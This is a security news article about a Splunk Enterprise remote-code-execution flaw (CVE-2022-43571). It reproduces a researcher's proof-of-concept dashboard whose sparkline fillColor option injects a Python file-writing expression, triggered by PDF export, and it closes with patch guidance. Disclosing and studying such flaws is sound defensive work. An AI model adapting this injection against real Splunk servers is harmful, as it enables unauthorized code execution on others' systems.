A security researcher has published proof-of-concept (PoC) code for the CVE-2022-43571 flaw on his blog that will execute code on Splunk Enterprise via the dashboard PDF generation component.
Splunk Inc. is an American software company based in San Francisco, California, that produces software for searching, monitoring, and analyzing machine-generated data via a Web-style interface. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
Last month, Splunk announced the release of a new set of quarterly patches for Splunk Enterprise, which include fixes for nine high-severity vulnerabilities.
The most severe of these security defects have a CVSS score of 8.8 and are described as remote code execution (RCE) flaws. Tracked as CVE-2022-43571, Splunk Enterprise could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an error in the dashboard PDF generation component. Due to code injection in the SimpleXML dashboard in Splunk Enterprise, a remote attacker with low privileges can construct a specially crafted data package to perform PDF export operations, and finally achieve arbitrary code execution.
The expert’s CVE-2022-43571 PoC contains a payload that is put in the SimpleXML dashboard with sparklines. The attacker goes to Export–>Generate PDF to trigger the code injection.
<dashboard script="table_with_multiple_sparkline_colors.js">
<label>Sparkline with different colors</label>
<row>
<panel>
<html depends="$alwaysHideCSSStylePanel$">
<style>
#tableWithMultipleSparklineColors table tbody tr td[data-cell-index="0"]{
font-size: 160% !important;
text-align:center !important;
color:white !important;
}
#tableWithMultipleSparklineColors table thead{
visibility:hidden !important;
}
#statistics table tbody tr:nth-child(1) td.string,
#statistics table tbody tr:nth-child(1) td.numeric{
font-size: 120%;
font-weight: bold;
}
</style>
</html>
<table id="tableWithMultipleSparklineColors">
<search>
<query>index=_internal
| chart sparkline(count) as sparkline count as Total by component
| sort - Total
| head 7
| reverse
| streamstats count as sno
| reverse
| append [| makeresults | fields - _time | eval sno="",sparkline="Sparkline", Total="Total"]
| reverse
| eval sno=sno-2
| eval sno=case(sno=-1,"down",
sno=0,"0",
sno=1,"1",
sno=2,"2",
sno=3,"3",
sno=4,"4",
sno=5,"All",
true(),sno)
| table sno sparkline Total</query>
<earliest>-2h@h</earliest>
<latest>now</latest>
<sampleRatio>1</sampleRatio>
</search>
<option name="count">20</option>
<option name="dataOverlayMode">none</option>
<option name="drilldown">none</option>
<option name="percentagesRow">false</option>
<option name="rowNumbers">false</option>
<option name="totalsRow">false</option>
<option name="wrap">true</option>
<format type="color" field="sno">
<colorPalette type="map">{"down":#336699,
"0":#8C0000,
"1":#8B4000,
"2":#FC6600,
"3":#F9A602,
"4":#FFCC00,
"All":#000000}</colorPalette>
</format>
<format field="sparkline" type="sparkline">
<option name="lineColor">green</option>
<option name="fillColor">open('/tmp/PoC_code_injection.txt','a').write('color your life!')</option>
<option name="height">20px</option>
<option name="width">500px</option>
</format>
</table>
</panel>
</row>
</dashboard>
This bug has been resolved with the release of Splunk Enterprise versions 8.1.12, 8.2.9, and 9.0.2. It is recommended that affected users update and upgrade to the latest version in time.
